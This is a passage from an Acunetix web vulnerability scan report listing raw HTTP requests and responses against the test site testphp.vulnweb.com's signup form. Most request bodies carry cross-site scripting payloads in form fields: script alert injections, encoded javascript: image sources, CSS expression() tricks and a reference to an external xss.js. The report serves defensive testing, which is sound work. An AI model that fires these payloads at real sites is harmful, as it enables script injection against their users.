/secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 326 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=alert(51 9335953405)%3B[email protected]&uphone=111-222-1933email@ad [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 314 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=[email protected][email protected]&ua [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Acunetix Website Audit

145

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 334 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc= alert(519375953405)%3B[email protected]&uphone=111-222-1933 [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=>'>alert (519345953405)%3B[email protected]&uphone=111-222-1933email @[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Acunetix Website Audit

146

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 350 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=&up Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 351 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=&up [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Acunetix Website Audit

147

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 357 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail="+src="http://testphp.acunetix.com/xss.js?520485953880">[email protected][email protected]&signup= Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=%00'">alert(520525953880)%3B&uphone=111-222-1933em [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Acunetix Website Audit

148

Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=alert(520505953880)%3B&uphone=111-222-1933e Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 311 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=[email protected]&uaddr [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 378 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix Website Audit

149

Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=[email protected]&uaddress=111-222-1933emai Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 347 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=&uphone [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 346 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix Website Audit

150

Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=email@somealert(519295953404)%3Bdomain.com&uphone Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 349 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28519315953404%29%3B%22%3E&upho [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 334 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm Acunetix Website Audit

151

[email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=alert(519275953404)%3B&uphone=111-222-193 Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=-->alert(519285953404)%3B&uphone=111-222-1933email @[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 314 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=[email protected]&ua [email protected]&signup=signup Acunetix Website Audit

152

Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 324 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=&uphone=111-222-1933email@addr [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 338 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=%3C/xss/*-*/style=xss:e/**/xpression(alert(521125954204))%[email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:30 GMT Acunetix Website Audit

153

Content-Type: text/html Connection: close /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=>'>alert(519245953404)%3B&uphone=111-222-1933email @[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=%00"'>alert(520535953880)%3B&uphone=111-222-1933em [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2

Acunetix Website Audit

154

/secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 337 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=alert(519265953404)%3B&uphone=111-222-1 [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 329 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=>">alert(519255953404)%3B&uphone=111-222-1933email @[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Acunetix Website Audit

155

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 326 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=alert(519235953404)%3B&uphone=111-222-1933email@ad [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:21 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 332 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=&uphone=111-222-1933em [email protected][email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Acunetix Website Audit

156

Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 356 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=[email protected][email protected]&signup=s Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 320 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=<%00script>alert(519835953550)%3B&uphone=111-222-1933email@address. [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Acunetix Website Audit

157

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 342 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28519875953550%29%3B%22%3E&uphone=111Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 400 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=[email protected]&uadd [email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Acunetix Website Audit

158

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 367 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address .tst&uemail=[email protected][email protected] Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 378 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=&uaddress=111-222-1933email @address.tst&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded Acunetix Website Audit

159

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 347 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=
Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 350 Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=[email protected]&signup=signup Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details Request POST /secured/newuser.php HTTP/1.0 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: testphp.vulnweb.com Content-Length: 311 Acunetix Website Audit

160

Cookie: mycookie=3 Connection: Close Pragma: no-cache Acunetix-Product: WVS/5.1 (Acunetix Web Vulnerability Scanner - NORMAL) Acunetix-Scanning-agreement: Third Party Scanning PROHIBITED Acunetix-User-agreement: http://www.acunetix.com/wvs/disc.htm [email protected][email protected][email protected][email protected]&ucc=111-222-1933email@address [email protected]&uphone=&uadd Response HTTP/1.1 200 OK Server: nginx/1.4.1 Date: Mon, 21 Aug 2017 08:47:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2 /secured/newuser.php Details

